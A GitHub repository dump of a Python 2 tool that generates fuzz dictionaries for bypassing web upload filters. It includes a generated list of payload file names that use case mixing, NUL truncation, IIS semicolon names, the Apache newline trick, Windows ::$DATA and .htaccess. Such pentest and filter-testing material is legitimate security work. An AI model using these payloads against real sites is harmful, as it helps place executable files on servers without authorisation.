├── .gitignore ├── LICENSE ├── README.md ├── dic ├── all_upload_fuzz.txt ├── apache_upload_fuzz.txt ├── asp_upload_fuzz.txt ├── iis_upload_fuzz.txt ├── jsp_upload_fuzz.txt ├── linux_upload_fuzz.txt ├── php_upload_fuzz.txt ├── tomcat_upload_fuzz.txt └── win_upload_fuzz.txt ├── doc ├── burp_intruder_setting.png └── upload_fuzz_dic.png └── upload-fuzz-dic-builder.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 
31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | .pytest_cache/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | db.sqlite3 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # Jupyter Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # SageMath parsed files 82 | *.sage.py 83 | 84 | # Environments 85 | .env 86 | .venv 87 | env/ 88 | venv/ 89 | ENV/ 90 | env.bak/ 91 | venv.bak/ 92 | 93 | # Spyder project settings 94 | .spyderproject 95 | .spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 残亦 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 
14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # upload-fuzz-dic-builder 上传漏洞fuzz字典生成脚本 2 | 3 | ![生成的字典](doc/upload_fuzz_dic.png) 4 | 5 | ## 一、uasg 6 | 7 | ``` 8 | $ python upload-fuzz-dic-builder.py -h 9 | usage: upload-fuzz-dic-builder [-h] [-n] [-a] [-l] [-m] [--os] [-d] [-o] 10 | 11 | optional arguments: 12 | -h, --help show this help message and exit 13 | -n , --upload-filename 14 | Upload file name 15 | -a , --allow-suffix Allowable upload suffix 16 | -l , --language Uploaded script language 17 | -m , --middleware Middleware used in Web System 18 | --os Target operating system type 19 | -d, --double-suffix Is it possible to generate double suffix? 20 | -o , --output Output file 21 | ``` 22 | 23 | ### 1.1 Example1 24 | 生成适合全语言,全部中间件,全部操作系统的fuzz字典 25 | 26 | ``` 27 | python upload-fuzz-dic-builder.py 28 | ``` 29 | 30 | ### 1.2 Example2 31 | 生成适合后端语言为`asp`的fuzz字典 32 | 33 | ``` 34 | python upload-fuzz-dic-builder.py -l asp 35 | ``` 36 | 37 | ### 1.3 Example3 38 | 上传文件名为:`test`,可以上传后缀为`jpg`,后端语言为`php`,中间件为`apache`,操作系统为`Windows`,输出字典名为`upload_filename.txt`的fuzz字典 39 | 40 | ``` 41 | python upload-fuzz-dic-builder.py -n test -a jpg -l php -m apache --os win -o upload_file.txt 42 | ``` 43 | 44 | 45 | ### 1.4 注意: 46 | 47 | 1. 生成时给的上传点相关信息越详细,生成的字典越精确! 48 | 2. 
在使用burp的Intruder模块进行fuzz时将Payload面板中`Payload Encoding`一栏的`URL-encode these characters`选项设置为未选中状态。 49 | 50 | ![burp intruder模块设置](doc/burp_intruder_setting.png) 51 | 52 | ## 二、more 53 | 54 | [构造优质上传漏洞fuzz字典](http://gv7.me/articles/2018/make-upload-vul-fuzz-dic/) -------------------------------------------------------------------------------- /dic/all_upload_fuzz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/dic/all_upload_fuzz.txt -------------------------------------------------------------------------------- /dic/apache_upload_fuzz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/dic/apache_upload_fuzz.txt -------------------------------------------------------------------------------- /dic/asp_upload_fuzz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/dic/asp_upload_fuzz.txt -------------------------------------------------------------------------------- /dic/iis_upload_fuzz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/dic/iis_upload_fuzz.txt -------------------------------------------------------------------------------- /dic/jsp_upload_fuzz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/dic/jsp_upload_fuzz.txt -------------------------------------------------------------------------------- /dic/linux_upload_fuzz.txt: 
-------------------------------------------------------------------------------- 1 | test.php3%00.jpg 2 | test.jspf/ 3 | test.aSp%00.jpg 4 | test.cEr.jpg 5 | test.jSpf%00.jpg 6 | test.Html 7 | 8 | test.htm%00.jpg 9 | test.ascx 10 | 11 | test.pHp.xxx 12 | test.jSpx.jpg 13 | test.cEr;.jpg 14 | test.Html 15 | test.aShx 16 | test.asa;.jpg 17 | test.pHp5 18 | 19 | test.aspx;.jpg 20 | test.asp.jpg 21 | test.pHp4 22 | 23 | test.php4/ 24 | test.pHp2.xxx 25 | test.asa%00.jpg 26 | test.cer.xxx 27 | test.ascx;.jpg 28 | test.php5;.jpg 29 | test.aSp 30 | 31 | test.php3%20 32 | test.htm.jpg 33 | test.aSmx.xxx 34 | test.php::$DATA 35 | test.pHp5.xxx 36 | test.php3.xxx 37 | test.aSp.jpg 38 | test.pHp2;.jpg 39 | test.asa.jpg 40 | test.php4 41 | 42 | test.aspx 43 | test.ashx.xxx 44 | test.aShx 45 | 46 | test.phtml%00.jpg 47 | test.cer%00.jpg 48 | test.jspa/ 49 | test.php5::$DATA 50 | test.aScx.jpg 51 | test.jsw::$DATA 52 | test.jspf%20 53 | test.php.xxx 54 | test.asp 55 | 56 | test.jSpa::$DATA 57 | test.jsw%20 58 | test.aSa%00.jpg 59 | test.aSmx%00.jpg 60 | test.cer 61 | test.pHtml 62 | 63 | test.asp%00.jpg 64 | test.pHp5%20 65 | test.aSpx 66 | test.php5/ 67 | test.php4;.jpg 68 | test.pHp3%00.jpg 69 | test.jsv%00.jpg 70 | test.pHp3/ 71 | test.asax.xxx 72 | test.jSpa.jpg 73 | test.cEr 74 | 75 | test.jSv::$DATA 76 | test.pHp2%20 77 | test.cer.jpg 78 | test.jSw%20 79 | test.jSv 80 | test.jSw 81 | test.jSp 82 | test.Htm 83 | 84 | test.php2%00.jpg 85 | test.php5 86 | 87 | test.jSw%00.jpg 88 | test.cEr.xxx 89 | test.jSw::$DATA 90 | test.php4.xxx 91 | test.aSa.xxx 92 | test.php2.xxx 93 | test.jspx.jpg 94 | test.jsw%00.jpg 95 | test.aScx 96 | 97 | test.htm 98 | test.php.jpg 99 | test.cer 100 | 101 | test.aSpx.xxx 102 | test.php2%20 103 | test.aSa.jpg 104 | test.jsp::$DATA 105 | test.pHp4%20 106 | test.aShx.jpg 107 | test.aSpx.jpg 108 | test.pht 109 | 110 | test.php3.jpg 111 | test.aSa 112 | 113 | test.pHtml 114 | test.jSpf/ 115 | test.jHtml 116 | test.aspx 117 | 118 | test.pHp5::$DATA 119 | 
test.php%20 120 | test.aShx.xxx 121 | test.jSpa%20 122 | test.cer;.jpg 123 | test.jtml 124 | test.jspx%00.jpg 125 | test.aspx.jpg 126 | test.aSa;.jpg 127 | test.jsw.jpg 128 | test.aSpx;.jpg 129 | test.jSv.jpg 130 | test.asa 131 | 132 | test.ascx.xxx 133 | test.jSp%20 134 | test.asmx 135 | 136 | test.asp 137 | test.jHtml%00.jpg 138 | test.jspx::$DATA 139 | test.jspf%00.jpg 140 | test.aSax.jpg 141 | test.pHp2::$DATA 142 | test.jSp.jpg 143 | test.asax 144 | test.Htm.xxx 145 | test.asa 146 | test.php5.xxx 147 | test.phtml.xxx 148 | test.jHtml::$DATA 149 | test.Html%00.jpg 150 | test.jspx/ 151 | test.ashx 152 | 153 | test.asa.xxx 154 | test.ashx;.jpg 155 | test.jHtml/ 156 | test.jSp::$DATA 157 | test.asax;.jpg 158 | test.jSpa/ 159 | test.jSpx::$DATA 160 | test.ascx.jpg 161 | test.html 162 | 163 | test.Htm%00.jpg 164 | test.php2::$DATA 165 | test.jsp.jpg 166 | test.aSax 167 | test.ashx 168 | test.cEr 169 | test.aShx%00.jpg 170 | test.php5%20 171 | test.aspx%00.jpg 172 | test.jsv.jpg 173 | test.htm 174 | 175 | test.aSmx;.jpg 176 | test.jsp%20 177 | test.pHp4.jpg 178 | test.jspf.jpg 179 | test.aSax;.jpg 180 | test.cEr%00.jpg 181 | test.aSpx 182 | 183 | test.Html.xxx 184 | test.jSp/ 185 | test.html.jpg 186 | test.jHtml%20 187 | test.php4::$DATA 188 | test.jSw.jpg 189 | test.jSpf%20 190 | test.asax.jpg 191 | test.pHp;.jpg 192 | test.jspa%00.jpg 193 | test.Html.jpg 194 | test.php%00.jpg 195 | test.php5.jpg 196 | test.pHp2%00.jpg 197 | test.jspa 198 | test.jtml%00.jpg 199 | test.aSmx 200 | 201 | test.php3/ 202 | test.pHp3::$DATA 203 | test.php3::$DATA 204 | test.jspf 205 | test.html.xxx 206 | test.asax 207 | 208 | test.jspa::$DATA 209 | test.aSax%00.jpg 210 | test.jSv/ 211 | test.php4%20 212 | test.pHp%20 213 | test.php;.jpg 214 | test.jspx 215 | test.pHp 216 | test.jHtml.jpg 217 | test.jSpx%00.jpg 218 | test.asp.xxx 219 | test.jSpa 220 | test.pHp2 221 | 222 | test.phtml 223 | test.ascx 224 | test.aScx;.jpg 225 | test.jSpf 226 | test.asmx.jpg 227 | test.jspa.jpg 228 | 
test.ascx%00.jpg 229 | test.asp;.jpg 230 | test.pHtml.xxx 231 | test.htm.xxx 232 | test.jSv%00.jpg 233 | test.pHp3;.jpg 234 | test.ashx.jpg 235 | test.php5%00.jpg 236 | test.pHtml%00.jpg 237 | test.jSpx 238 | test.jsw/ 239 | test.jtml.jpg 240 | test.aScx.xxx 241 | test.asax%00.jpg 242 | test.aSp 243 | test.pHp2/ 244 | test.aScx 245 | test.jsv%20 246 | test.pht.xxx 247 | test.php2.jpg 248 | test.Htm 249 | test.jsp/ 250 | test.pHp3%20 251 | test.php4%00.jpg 252 | test.aSa 253 | test.php3;.jpg 254 | test.jtml/ 255 | test.jspx%20 256 | test.jSpx/ 257 | test.pHp5%00.jpg 258 | test.ashx%00.jpg 259 | test.aShx;.jpg 260 | test.aScx%00.jpg 261 | test.pHp/ 262 | test.php2/ 263 | test.jSv%20 264 | test.pHp5;.jpg 265 | test.jspa%20 266 | test.aSax 267 | 268 | test.pht%00.jpg 269 | test.jsv/ 270 | test.pHp::$DATA 271 | test.pht.jpg 272 | test.pHp3.xxx 273 | test.phtml 274 | 275 | test.pHp4 276 | test.pHp5 277 | test.jSpx%20 278 | test.phtml.jpg 279 | test.jsp%00.jpg 280 | test.pHp2 281 | test.pHp3 282 | test.php2 283 | 284 | test.aspx.xxx 285 | test.php/ 286 | test.pHp 287 | 288 | test.pHp4::$DATA 289 | test.asmx 290 | test.jspf::$DATA 291 | test.aSpx%00.jpg 292 | test.asmx.xxx 293 | test.pHp5.jpg 294 | test.html 295 | test.asmx%00.jpg 296 | test.pHp3 297 | 298 | test.php 299 | 300 | test.pHp.jpg 301 | test.php4 302 | test.php5 303 | test.php2;.jpg 304 | test.pHtml.jpg 305 | test.jtml%20 306 | test.php2 307 | test.php3 308 | test.jtml::$DATA 309 | test.jSp%00.jpg 310 | test.pHp4;.jpg 311 | test.php4.jpg 312 | test.aSmx 313 | test.jsv::$DATA 314 | test.aSmx.jpg 315 | test.jsv 316 | test.jsw 317 | test.jsp 318 | test.jSpf::$DATA 319 | test.aSax.xxx 320 | test.php 321 | test.pHp3.jpg 322 | test.pHp4.xxx 323 | test.pht 324 | test.asmx;.jpg 325 | test.Htm.jpg 326 | test.jSpf.jpg 327 | test.pHp4%00.jpg 328 | test.pHp2.jpg 329 | test.pHp%00.jpg 330 | test.aSp;.jpg 331 | test.jSpa%00.jpg 332 | test.php3 333 | 334 | test.jSw/ 335 | test.html%00.jpg 336 | test.pHp5/ 337 | test.pHp4/ 338 
| test.aSp.xxx 339 | .htaccess 340 | -------------------------------------------------------------------------------- /dic/php_upload_fuzz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/dic/php_upload_fuzz.txt -------------------------------------------------------------------------------- /dic/tomcat_upload_fuzz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/dic/tomcat_upload_fuzz.txt -------------------------------------------------------------------------------- /dic/win_upload_fuzz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/dic/win_upload_fuzz.txt -------------------------------------------------------------------------------- /doc/burp_intruder_setting.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/doc/burp_intruder_setting.png -------------------------------------------------------------------------------- /doc/upload_fuzz_dic.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/doc/upload_fuzz_dic.png -------------------------------------------------------------------------------- /upload-fuzz-dic-builder.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | author: c0ny1 4 | github: https://github.com/c0ny1/upload-fuzz-dic-builder 5 | date: 2018-11-04 23:16 6 | description: 生成符合漏洞实际场景fuzz字典的脚本 
'''
# NOTE(review): this script is Python 2 code — it uses the `print` statement and
# `urllib.unquote`, neither of which exists in Python 3 (`urllib.unquote` would be
# `urllib.parse.unquote` there). Run it under Python 2 as written.
#
# What it builds: a list of file names that combine a script-capable suffix with
# the parsing quirks of common web servers and operating systems. From a
# defender's side these are the shapes an upload allowlist must normalise and
# reject (case, trailing characters, embedded NUL/newline, multiple extensions,
# `.htaccess`); the generated file is a regression set for such a filter.

import argparse
import copy
import urllib

## Suffixes that each server-side language will execute.
## Mixed-case spellings are listed explicitly; further case variants are added
## at run time by list_case_mixing() when the target OS is Windows or "all".
html_parse_suffix = ['html','htm','phtml','pht','Html','Htm','pHtml']
asp_parse_suffix = ['asp','aspx','asa','asax','ascx','ashx','asmx','cer','aSp','aSpx','aSa','aSax','aScx','aShx','aSmx','cEr']
php_parse_suffix = ['php','php5','php4','php3','php2','pHp','pHp5','pHp4','pHp3','pHp2']
jsp_parse_suffix = ['jsp','jspa','jspx','jsw','jsv','jspf','jtml','jSp','jSpx','jSpa','jSw','jSv','jSpf','jHtml']


## Middleware (web server) parsing quirks.
def iis_suffix_creater(suffix):
    # IIS-style "<script suffix>;.<allowed suffix>" names.
    # NOTE(review): `allow_suffix` is not a parameter here; it is resolved as a
    # module global that is only bound inside the `__main__` block below, so
    # calling this function from another module raises NameError.
    res = []
    for l in suffix:
        str ='%s;.%s' % (l,allow_suffix)   # `str` shadows the builtin (unchanged, see note above)
        res.append(str)
    return res

def apache_suffix_creater(suffix):
    # Two Apache variants per suffix: an unknown trailing extension ("<s>.xxx")
    # and the suffix followed by a literal newline (urllib.unquote('%0a') == '\n').
    res = []
    for l in suffix:
        str = '%s.xxx' % l
        res.append(str)
        str = '%s%s' % (l,urllib.unquote('%0a')) #CVE-2017-15715
        res.append(str)
    return res

# Trailing fragments tried after each suffix for Tomcat on Windows.
win_tomcat = ['%20','::$DATA','/']
def tomcat_suffix_creater(suffix):
    # Cartesian product of every suffix with every entry of win_tomcat.
    res = []
    for l in suffix:
        for t in win_tomcat:
            str = '%s%s' % (l,t)
            res.append(str)
    return res

## Operating-system file-name characteristics.
def str_81_to_ff():
    # Returns the 127 single bytes 0x81..0xff, produced by URL-decoding
    # '%81'..'%ff'. Under Python 2 each element is a one-byte `str`; these are
    # written to the output file verbatim, which is why the dictionary is not
    # valid UTF-8 text.
    res = []
    for i in range(129,256):
        str = '%x' % i
        str = '%' + str
        str = urllib.unquote(str)
        res.append(str)
    return res

# Trailing fragments appended to each suffix for Windows targets. The first
# nine are literal strings ('%20' and '%00' are NOT decoded here); the rest are
# the raw high bytes from str_81_to_ff(), evaluated once at import time.
windows_os = [' ','.','/','::$DATA','<','>','>>>','%20','%00'] + str_81_to_ff()

def windows_suffix_creater(suffix):
    # Cartesian product of every suffix with every entry of windows_os.
    res = []
    for s in suffix:
        for w in windows_os:
            str = '%s%s' % (s,w)
            res.append(str)
    return res

## Language-level NUL truncation ("%00" and a real NUL byte).
def str_00_truncation(suffix,allow_suffix):
    # For each suffix emits "<s>%00.<allow>" (literal percent sequence) and
    # "<s>\x00.<allow>" (decoded NUL byte). Unlike iis_suffix_creater, this one
    # takes allow_suffix as an explicit parameter.
    res = []
    for i in suffix:
        str = '%s%s.%s' % (i,'%00',allow_suffix)
        res.append(str)
        str = '%s%s.%s' % (i,urllib.unquote('%00'),allow_suffix)
        res.append(str)
    return res

## Case variants of a word.
def str_case_mixing(word):
    # Lower-cases `word`, then upper-cases every contiguous slice [i:j]
    # (0 <= i <= j <= len). So the result is every variant with ONE contiguous
    # upper-case run (including the all-lower and all-upper forms), not all
    # 2**n case combinations. Duplicates are removed via the dict; the output
    # order is the dict's iteration order, i.e. unspecified under Python 2.
    str_list = []
    word = word.lower()
    tempWord = copy.deepcopy(word)   # a str is immutable, so this copy is redundant

    plist = []
    redict = {}
    for char in range( len( tempWord ) ):
        char = word[char]   # loop index is rebound to the character itself
        plist.append(char)
    num = len( plist )
    for i in range( num ):
        for j in range( i , num + 1 ):
            sContent = ''.join( plist[0:i] )
            mContent = ''.join( plist[i:j] )
            mContent = mContent.upper()
            eContent = ''.join( plist[j:] )
            content = '''%s%s%s''' % (sContent,mContent,eContent)
            redict[content] = None

    for i in redict.keys():
        str_list.append(i)

    return str_list

## Case variants for every element of a list (concatenated, not de-duplicated).
def list_case_mixing(li):
    res = []
    for l in li:
        res += str_case_mixing(l)
    return res

## Double-suffix generation.
def str_double_suffix_creater(suffix):
    # Inserts the whole `suffix` string between each pair of its own characters
    # (positions 1..len-1), e.g. 'php' -> 'pphphp', 'phphpp'. A one-character
    # suffix yields nothing because range(1, 1) is empty.
    res = []
    for i in range(1,len(suffix)):
        str = list(suffix)
        str.insert(i,suffix)
        res.append("".join(str))
    return res

def list_double_suffix_creater(list_suffix):
    # str_double_suffix_creater over a list, de-duplicated (order not preserved).
    res = []
    for l in list_suffix:
        res += str_double_suffix_creater(l)
    return duplicate_removal(res)

# De-duplicate a list. Goes through a set, so element order is not preserved.
def duplicate_removal(li):
    return list(set(li))

# Drop empty-ish entries ('', ' ', None) from a list, in place.
# NOTE(review): the list is modified while being iterated, so the element
# that follows a removed one is skipped; two adjacent blank entries are not
# both removed in a single pass. `li.remove(r)` also removes the first equal
# element, not necessarily the current one (same value, so the result is the same).
def clear_list(li):
    rmstr = ['',' ',None]
    for l in li:
        for r in rmstr:
            if l == r:
                li.remove(r)
    return li

def parse_args():
    # Command-line interface. `metavar=''` is why the help text renders the
    # options as "-n , --upload-filename" with an empty placeholder.
    parser = argparse.ArgumentParser(prog='upload-fuzz-dic-builder',
                                     formatter_class=argparse.RawTextHelpFormatter,
                                     description='')

    parser.add_argument('-n','--upload-filename',metavar='',dest='upload_file_name', type=str, default='test',
                        help=u'Upload file name')

    parser.add_argument('-a','--allow-suffix',metavar='',dest='allow_suffix', type=str, default='jpg',
                        help=u'Allowable upload suffix')

    parser.add_argument('-l','--language',metavar='',dest='language',choices=['asp','php','jsp','all'], type=str, default='all',
                        help='Uploaded script language')

    parser.add_argument('-m','--middleware',metavar='',dest='middleware',choices=['iis','apache','tomcat','all'],type=str, default='all',
                        help='Middleware used in Web System')
    parser.add_argument('--os',metavar='',dest='os', choices=['win','linux','all'],type=str, default='all',
                        help='Target operating system type')

    parser.add_argument('-d','--double-suffix',dest='double_suffix', default=False,action='store_true',
                        help='Is it possible to generate double suffix?')
    parser.add_argument('-o','--output',metavar='',dest='output_filename', type=str, default='upload_fuzz_dic.txt',
                        help='Output file')

    args = parser.parse_args()
    return args

if __name__ == '__main__':

    args = parse_args()
    upload_file_name = args.upload_file_name
    allow_suffix = args.allow_suffix   # also read as a global by iis_suffix_creater()
    output_filename =args.output_filename

    language = args.language
    middleware = args.middleware
    os = args.os   # NOTE(review): shadows the name of the stdlib `os` module (not imported here)
    double_suffix =args.double_suffix

    # IIS implies a Windows host.
    if middleware == 'iis':
        os = 'win'

    ###################################

    # NOTE(review): the output file is opened here and only closed at the very
    # end; any exception in between leaves it open and truncated. A `with`
    # block around the write loops would be the usual fix.
    f = open(output_filename,'w')
    parse_suffix = []
    case_parse_suffix = []
    middleware_parse_suffix = []
    htaccess_suffix = []
    os_parse_suffix = []
    double_parse_suffix = []


    # Executable suffixes for the chosen language. Because this block runs at
    # module scope, the assignments below rebind the module-level lists, so the
    # per-language lists used further down are already narrowed.
    if language == 'asp':
        html_parse_suffix = []
        php_parse_suffix = []
        jsp_parse_suffix = []
        parse_suffix = asp_parse_suffix
    elif language == 'php':
        asp_parse_suffix = []
        jsp_parse_suffix = []
        parse_suffix = html_parse_suffix + php_parse_suffix
    elif language == 'jsp':
        html_parse_suffix = []
        asp_parse_suffix = []
        php_parse_suffix = []
        parse_suffix = jsp_parse_suffix
    else: # language == 'all'
        parse_suffix = html_parse_suffix + asp_parse_suffix + php_parse_suffix + jsp_parse_suffix
    print u'[+] 收集%d条可解析后缀完毕!' % len(parse_suffix)

    # Executable suffixes + case variants (Windows file systems are
    # case-insensitive; on Linux the lists are used unchanged).
    if os == 'win' or os == 'all':
        case_html_parse_suffix = list_case_mixing(html_parse_suffix)
        case_asp_parse_suffix = list_case_mixing(asp_parse_suffix)
        case_php_parse_suffix = list_case_mixing(php_parse_suffix)
        case_jsp_parse_suffix = list_case_mixing(jsp_parse_suffix)
        case_parse_suffix = list_case_mixing(parse_suffix)
        print u'[+] 加入%d条可解析后缀大小写混合完毕!' % len(case_parse_suffix)
    else: # os == 'linux'
        case_html_parse_suffix = html_parse_suffix
        case_asp_parse_suffix = asp_parse_suffix
        case_php_parse_suffix = php_parse_suffix
        case_jsp_parse_suffix = jsp_parse_suffix
        case_parse_suffix = parse_suffix

    # Middleware parsing quirks. Note the asymmetry: the 'iis' branch feeds
    # asp+php+jsp, while the 'all' branch feeds only asp+php to iis_suffix_creater.
    if middleware == 'iis':
        case_asp_php_jsp_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_jsp_parse_suffix
        middleware_parse_suffix = iis_suffix_creater(case_asp_php_jsp_parse_suffix)
    elif middleware == 'apache':
        case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix
        middleware_parse_suffix = apache_suffix_creater(case_asp_php_html_parse_suffix)
    elif middleware == 'tomcat' and os == 'linux':
        middleware_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
    elif middleware == 'tomcat' and (os == 'win' or os == 'all'):
        case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
        middleware_parse_suffix = tomcat_suffix_creater(case_php_jsp_parse_suffix)
    else:
        case_asp_php_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix
        iis_parse_suffix = iis_suffix_creater(case_asp_php_parse_suffix)
        case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix
        apache_parse_suffix = apache_suffix_creater(case_asp_php_html_parse_suffix)
        case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
        tomcat_parse_suffix = tomcat_suffix_creater(case_php_jsp_parse_suffix)
        middleware_parse_suffix = iis_parse_suffix + apache_parse_suffix + tomcat_parse_suffix

    middleware_parse_suffix = duplicate_removal(middleware_parse_suffix)
    print u'[+] 加入%d条中间件漏洞完毕!' % len(middleware_parse_suffix)

    # .htaccess (Apache only). Written later WITHOUT the upload_file_name prefix.
    if (middleware == 'apache' or middleware == 'all') and (os == 'win' or os == 'all'):
        htaccess_suffix = str_case_mixing(".htaccess")
        print u'[+] 加入%d条.htaccess完毕!' % len(htaccess_suffix)
    elif (middleware == 'apache' or middleware == 'all') and os == 'linux':
        htaccess_suffix = ['.htaccess']
        print u'[+] 加入1条.htaccess'
    else:
        htaccess_suffix = []

    # Operating-system characteristics.
    if os == 'win':
        os_parse_suffix = windows_suffix_creater(case_parse_suffix)
    elif os == 'linux':
        os_parse_suffix = parse_suffix
    else:
        win_suffix = windows_suffix_creater(case_parse_suffix)
        linux_suffix = parse_suffix
        os_parse_suffix = win_suffix + linux_suffix

    os_parse_suffix = duplicate_removal(os_parse_suffix)
    print u'[+] 加入%d条系统特性完毕!' % len(os_parse_suffix)

    # Language-level NUL truncation, generated for every language/OS choice.
    # (`language_parse_suffux` is a typo for "suffix"; kept as is.)

    language_parse_suffux = str_00_truncation(case_parse_suffix,allow_suffix)

    # Double suffix + case variants (opt-in via -d).
    if double_suffix:
        double_parse_suffix = list_double_suffix_creater(case_parse_suffix)
        print u'[+] 加入%d条双后缀完毕!' % len(double_parse_suffix)
    else:
        double_parse_suffix = []

    all_parse_suffix = case_parse_suffix + middleware_parse_suffix + os_parse_suffix + language_parse_suffux + double_parse_suffix
    all_parse_suffix = duplicate_removal(all_parse_suffix)
    all_parse_suffix = clear_list(all_parse_suffix)
    # Write the file: "<upload_file_name>.<entry>" per line. Entries that carry
    # a raw newline (apache generator), a NUL or a high byte are written as-is,
    # so the output is not strictly one entry per line nor valid UTF-8.
    num = len(all_parse_suffix)
    for i in all_parse_suffix:
        str = '%s.%s' % (upload_file_name,i)
        #print '[+] '+type(str)
        f.write(str)
        f.write('\n')
    num += len(htaccess_suffix)
    for i in htaccess_suffix:
        f.write(i)
        f.write('\n')
    f.close()
    print u'[+] 去重后共%s条数据写入%s文件' % (num,output_filename)